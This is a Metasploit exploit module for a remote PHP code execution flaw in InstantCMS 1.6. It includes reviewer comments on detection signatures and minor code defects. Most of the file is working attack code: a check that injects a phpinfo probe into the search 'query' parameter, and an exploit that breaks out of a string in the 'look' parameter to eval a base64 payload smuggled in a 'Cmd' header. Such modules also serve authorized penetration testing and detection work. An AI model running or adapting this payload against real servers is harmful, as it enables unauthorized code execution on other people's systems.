##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for InstantCMS 1.6 (BID 60816): request parameters of the
# `view=search` page reach PHP eval(), so a crafted `query`/`look` value runs
# attacker-supplied PHP. `check` probes via `query`, `exploit` stages via `look`.
# From a defender's view both paths leave clear request-level artifacts (see the
# comments on each method); patching past 1.6 is the fix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and the single user-settable option (TARGETURI, default "/").
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',
        'Description' => %q{
          This module exploits an arbitrary PHP command execution vulnerability because of a
          dangerous use of eval() in InstantCMS in versions 1.6 and prior.
        },
        'Author' => [
          'AkaStep', # Vulnerability discovery and PoC
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '60816' ],
          [ 'PACKETSTORM', '122176' ]
        ],
        'Privileged' => false,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [
          [ 'InstantCMS 1.6', {} ],
        ],
        'DisclosureDate' => '2013-06-26',
        'DefaultTarget' => 0,
        # Reliability/stability/side effects were never characterised for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])
      ]
    )
  end

  # Vulnerability check: sends a `${echo phpinfo()}` probe in the `query`
  # parameter and treats a "Build Date" string in the response (phpinfo() output)
  # as proof of evaluation.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is seen, Safe otherwise.
  #
  # NOTE(review): a nil response (timeout, connection refused) also yields Safe
  # rather than Unknown, so a transport failure is indistinguishable from a patched
  # host. This probe is itself noisy: a `${` sequence in the search `query`
  # parameter is a usable detection signature.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.to_s),
      'vars_get' =>
        {
          'view' => 'search',
          'query' => '${echo phpinfo()}'
        }
    })

    # `and` works here because the whole expression is the `if` condition; `&&` would be the idiomatic form.
    if res and res.body.match(/Build Date/)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Delivers the payload. `query` is random filler; `look` closes the server-side
  # string context and appends an eval(base64_decode(...)) stage that reads the
  # real payload from the `Cmd` request header (base64-encoded), keeping it out
  # of the URL.
  #
  # Detection notes: a `view=search` request whose `look` value contains
  # `eval(` / `base64_decode(`, or any request carrying an unexpected `Cmd`
  # header with base64 content, is characteristic of this module.
  #
  # NOTE(review): `res` is assigned but never read; the response is not checked,
  # so a failed delivery is not reported to the operator.
  def exploit
    print_status("Executing payload...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.to_s),
      'vars_get' =>
        {
          'view' => 'search',
          'query' => rand_text_alpha(3 + rand(3)),
          'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"
        },
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })
  end
end